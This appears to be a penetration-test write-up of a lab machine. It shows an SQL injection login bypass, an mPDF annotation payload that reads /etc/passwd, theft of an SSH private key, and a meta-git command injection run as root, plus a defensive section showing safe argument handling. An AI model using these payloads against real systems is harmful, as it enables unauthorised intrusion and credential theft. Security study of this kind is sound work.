
Pentest mPDF read any file and meta-git RCE to root

Situation:

  • School admin panel with a PDF download option using mPDF.

Logged in as admin with an SQL injection bypass: 'or 1='1'#

Checking the request with Burp Suite:

Decoding it from Base64:

Interesting info from GitHub:

Using CyberChef:

https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPg

CMD

❯ curl http://xxxxxxxxxxx/admin/download.php -H "Cookie: PHPSESSID=dd213s23d8mg2kds8fo10hf9hib" -d "pdf=JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGFzc3dkJTI1MjIlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1MjB0aXRsZT0lMjUyMkF0dGFjaGVkJTI1MjBGaWxlOiUyNTIwL2V0Yy9wYXNzd2QlMjUyMiUyNTIwcG9zLXg9JTI1MjIxOTUlMjUyMiUyNTIwLyUyNTNF"

Result output:
OKdAtpf213e12edyJeFWPExZ0H.pdf

CMD AGAIN

❯ curl http://xxxxxx/mpdf/tmp/OKdAtpf213e12edyJeFWPExZ0H.pdf --output passwd.pdf

Reading the PDF, I was able to read passwd.
Then I was able to read id_rsa and get SSH access!
Next, root: linpeas and pspy showed nothing interesting.
Ran sudo -l.
Result:
User may run the following commands on faculty:
    (root) /usr/local/bin/meta-git
Found this report online describing a command execution PoC in npm: https://hackerone.com/reports/728040
GitHub check!
Time for the proof:
xxxxx@xxxxxxxxxxxx:/$ sudo -u root meta-git clone 'tcpguard| whoami'
meta git cloning into 'tcpguard| whoami' at tcpguard| whoami
tcpguard| whoami: fatal: repository 'tcpguard' does not exist
whoami: ‘tcpguard’: no such user
root

Trying to read the root SSH key:

user@xxxxxxxxxxxxx:/$ sudo -u root meta-git clone 'tcpguard| cat ~/.ssh/id_rsa' 
meta git cloning into 'tcpguard| cat ~/.ssh/id_rsa' at id_rsa 
id_rsa: fatal: repository 'tcpguard' does not exist

 

....

rooted !~#
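
The meta-git step above works because the repository name reaches a shell as part of a command string. The following is an added example, not code from this post and not meta-git's own source: the function names and the allow-list regex are assumptions, and it contrasts the string-built command with a validated argv passed to execFile.

```javascript
// Added example: hypothetical wrapper, NOT meta-git's source code.
const { execFileSync } = require('node:child_process');
const path = require('node:path');

// Vulnerable pattern, returned as a string and never executed here: the repo
// name is pasted into a shell command line, so | ; $() are parsed by /bin/sh.
function unsafeCloneCommand(repo) {
  return `git clone ${repo} ${path.basename(repo)}`;
}

// Assumed allow-list: URL/path characters only, no whitespace or shell metacharacters.
const SAFE_REPO = /^[A-Za-z0-9._~:\/@-]+$/;

// Hardened pattern: validate first, then build an argv array (no shell involved).
function safeCloneArgs(repo) {
  if (typeof repo !== 'string' || repo.startsWith('-') || !SAFE_REPO.test(repo)) {
    throw new Error(`rejected repository argument: ${JSON.stringify(repo)}`);
  }
  const dest = path.basename(repo).replace(/\.git$/, '');
  // "--" ends option parsing, so the repo can never be read as a git flag.
  return ['clone', '--', repo, dest];
}

// execFile passes each array element to the program as one literal argument.
function safeClone(repo) {
  return execFileSync('git', safeCloneArgs(repo), { stdio: 'inherit' });
}

// Shows what a child process receives via execFile: the string from the post
// arrives as a single argument, and the pipe is never interpreted.
function argvSeenByChild(arg) {
  const script = 'process.stdout.write(process.argv[1])';
  return execFileSync(process.execPath, ['-e', script, arg], { encoding: 'utf8' });
}
```

Independently of the code fix, the sudoers entry that lets an unprivileged user run /usr/local/bin/meta-git as root is what turns this bug into a root shell, so that rule deserves review as well.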

